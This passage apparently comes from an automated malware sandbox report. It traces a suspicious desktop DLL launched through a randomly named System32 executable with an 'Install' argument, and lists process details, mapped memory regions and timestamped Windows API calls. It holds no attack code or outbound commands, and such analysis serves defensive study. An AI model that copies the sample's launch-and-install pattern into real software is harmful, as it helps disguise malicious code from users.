lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.922] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.922] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.922] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.923] HeapDestroy (hHeap=0x2d0000) returned 1 Process: id = "29" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fa00" os_pid = "0xbac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"Install\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1352 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1353 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1354 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1355 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1356 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1357 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1358 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1359 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1360 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1361 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1362 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1363 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1364 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1365 start_va = 0x680000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1366 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1367 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1368 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1369 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1370 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1371 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1372 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1373 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1374 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1375 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1376 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1377 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1378 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1379 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1380 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1381 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1382 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 1383 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 1384 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 1385 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1386 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 1387 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1388 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1389 start_va = 0x2f0000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1390 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1391 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1392 start_va = 0x350000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Thread: id = 64 os_tid = 0xbb0 [0032.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efba4 | out: lpSystemTimeAsFileTime=0x2efba4*(dwLowDateTime=0xe15d65f0, dwHighDateTime=0x1d3dfba)) [0032.960] GetCurrentProcessId () returned 0xbac [0032.960] GetCurrentThreadId () returned 0xbb0 [0032.960] GetTickCount () returned 0x17647 [0032.960] QueryPerformanceCounter (in: lpPerformanceCount=0x2efb9c | out: lpPerformanceCount=0x2efb9c*=365649693) returned 1 [0032.960] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.960] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0032.960] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0032.961] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0032.961] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0032.961] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.961] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.961] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.961] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.961] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.961] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.961] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.961] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.961] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.962] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.962] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.962] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.962] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.962] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.963] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.963] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.963] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.963] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.963] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0032.963] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0032.963] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0032.963] GetCurrentThreadId () returned 0xbb0 [0032.963] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"Install\"" [0032.963] GetEnvironmentStringsW () returned 0x407908* [0032.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0032.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x3409f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0032.964] FreeEnvironmentStringsW (penv=0x407908) returned 1 [0032.964] GetStartupInfoA (in: lpStartupInfo=0x2efaf4 | out: lpStartupInfo=0x2efaf4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0032.964] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0032.964] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0032.964] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0032.964] SetHandleCount (uNumber=0x20) returned 0x20 [0032.964] GetLastError () returned 0x0 [0032.964] SetLastError (dwErrCode=0x0) [0032.964] GetLastError () returned 0x0 [0032.964] SetLastError (dwErrCode=0x0) [0032.964] GetLastError () returned 0x0 [0032.964] SetLastError (dwErrCode=0x0) [0032.964] GetACP () returned 0x4e4 [0032.964] GetLastError () returned 0x0 [0032.964] SetLastError (dwErrCode=0x0) [0032.964] IsValidCodePage (CodePage=0x4e4) returned 1 [0032.964] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2efad4 | out: lpCPInfo=0x2efad4) returned 1 [0032.964] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2ef5a0 | out: lpCPInfo=0x2ef5a0) returned 1 [0032.964] GetLastError () returned 0x0 [0032.964] SetLastError (dwErrCode=0x0) [0032.965] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x2ef530 | out: lpCharType=0x2ef530) returned 1 [0032.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x2ef318, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.965] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x2ef5b4 | out: lpCharType=0x2ef5b4) returned 1 [0032.965] GetLastError () returned 0x0 [0032.965] SetLastError (dwErrCode=0x0) [0032.965] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0032.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x2ef2e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ듃矲狰Ā") returned 256 [0032.965] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ듃矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.965] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ듃矲狰Ā", cchSrc=256, lpDestStr=0x2ef0d8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0032.965] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2ef8b4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ4\x01\x7fôìú.", lpUsedDefaultChar=0x0) returned 256 [0032.965] GetLastError () returned 0x0 [0032.965] SetLastError (dwErrCode=0x0) [0032.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0032.965] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2ef9b4, cbMultiByte=256, lpWideCharStr=0x2ef308, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ듃矲狰Ā") returned 256 [0032.965] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ듃矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0032.965] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ듃矲狰Ā", cchSrc=256, lpDestStr=0x2ef0f8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0032.965] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ 